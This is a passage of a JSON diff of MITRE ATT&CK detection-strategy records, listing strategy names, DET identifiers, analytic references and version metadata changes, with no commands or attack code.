+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Process Creation or Modification Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9a65f8bc-1b81-4e05-8e8b-bfdb0d581213",
+                        "x-mitre-analytic--9a73d14c-ce3c-47c5-a6c2-3d6b49c4d009",
+                        "x-mitre-analytic--f315abd4-7115-45ac-9466-64c23367cd41",
+                        "x-mitre-analytic--52ee5593-7db2-4ad0-b5f4-630ebcf2ce0f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d8e8768e-34c1-45f4-95d2-fa7ba317b63a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0483",
+                            "external_id": "DET0483"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of System Service Discovery Commands Across OS Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--475313b7-c26f-44f6-a8f3-09b57f03fcd8",
+                        "x-mitre-analytic--20879a60-f16c-4a90-bd71-2c8865c99481",
+                        "x-mitre-analytic--8f654b08-222f-4fc0-83cc-ab871e290d1e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3c335443-c161-4149-9c85-d7a014550099",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.675000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0253",
+                            "external_id": "DET0253"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Systemd Service Creation or Modification on Linux",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4da5660a-3b1c-4b4d-ad79-991bef456b20"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.675000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cdfe6166-43e9-434a-a961-139edd58ca0c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0471",
+                            "external_id": "DET0471"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Tainted Content Written to Shared Storage",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--a0554596-7100-4f8b-a4dd-165f528fe6a1",
+                        "x-mitre-analytic--7518f788-43dd-440a-955c-870cdb7dea26",
+                        "x-mitre-analytic--3f36a861-3be2-4f6d-bfad-f044cdc01b15",
+                        "x-mitre-analytic--49e91c60-9b73-4a0a-9510-f94152a8ba5e",
+                        "x-mitre-analytic--bc143cf2-d6fb-4ea4-98a5-a2db81fc3f84"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--deb0a989-7d09-4403-b1a1-8658e36a0f9a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0816",
+                            "external_id": "DET0816"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Threat Intel Vendors",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--23855fa6-f6d6-4a9c-a270-ea1f2830ef60"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cb821d3c-ede3-43a4-915b-f779b04318f6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0852",
+                            "external_id": "DET0852"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Tool",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--6f7fa682-fd50-4de4-add3-cbaa3c127b70"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9e93c9d8-3e37-45ae-88d5-12914d98ba5a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0458",
+                            "external_id": "DET0458"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Trust Relationship Modifications in Domain or Tenant Policies",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c84ed29d-c0bf-465c-9e4a-7685cd4ff444",
+                        "x-mitre-analytic--a2d3072a-0f3a-46a1-a92e-f0d7ae030b48"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f6dd18b4-8534-4883-8d57-80655418bed4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0220",
+                            "external_id": "DET0220"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of USB-Based Data Exfiltration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--67ff7cc5-7b9b-4d15-b115-b55c3d164c64",
+                        "x-mitre-analytic--9cf3c7bb-296e-445a-ba30-012060b9ccac",
+                        "x-mitre-analytic--9d7fd025-d8eb-48ab-8fca-df6b09761aec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3796aa06-65fe-4b9d-9d31-e6491b722632",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0594",
+                            "external_id": "DET0594"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Unauthorized DCSync Operations via Replication API Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--9a68f1a7-65f0-4eef-a711-888bccbeb0d5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3a114d11-0850-4c33-b828-359e59b15250",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0306",
+                            "external_id": "DET0306"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Unauthorized Network Firewall Rule Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--17ce541a-23fa-4b33-affc-c6ba906e9956"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:26:54.885Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--faa650c9-a469-45f1-870a-6acc448df9eb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0824",
+                            "external_id": "DET0824"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Upload Malware",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4ef6c517-011e-4155-897f-e86cea5824b4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--80d1271b-a18a-469a-a60a-81d8f468b0e6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0834",
+                            "external_id": "DET0834"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Upload Tool",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4403499c-b81c-4d0e-896c-67178547ac18"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a6245075-b59f-46cf-8b76-e8d95c378a22",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0560",
+                            "external_id": "DET0560"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Valid Account Abuse Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f9c3a686-2894-498d-9d04-7ac510752e1f",
+                        "x-mitre-analytic--6cf46787-028d-4ac8-9dfa-58682edb3625",
+                        "x-mitre-analytic--d059a437-bf45-4b10-a36c-7e42e183d3c7",
+                        "x-mitre-analytic--aa255cdc-0b49-4ad3-951d-eab5582da56f",
+                        "x-mitre-analytic--dc062a09-572e-41fc-bfff-f654751a6a0f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cfcbb930-2395-4f7a-b95c-6b2736679c81",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0854",
+                            "external_id": "DET0854"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Virtual Private Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4dbe3d83-4e01-455f-94f2-a1a31b410b47"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6e53a352-9654-41fe-bf43-50e6b23a4ac1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0838",
+                            "external_id": "DET0838"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Virtual Private Server",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4884ba77-1420-4093-9dba-65e881f6dca5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--80741edd-b775-4c33-91a2-4a0d1ee4f6bc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0808",
+                            "external_id": "DET0808"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Vulnerabilities",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--193167de-400a-4ea3-a8db-93e4bf628068"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--574d055c-4501-4f4d-9b28-1109ad07a087",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0867",
+                            "external_id": "DET0867"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Vulnerability Scanning",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f2f01ea3-a59c-42b1-b934-83065ae1f785"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--92955a28-74fb-4f60-834a-10dc93377140",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.685000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0832",
+                            "external_id": "DET0832"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of WHOIS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b5842814-7d1b-484d-acd8-d1f776c6851f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
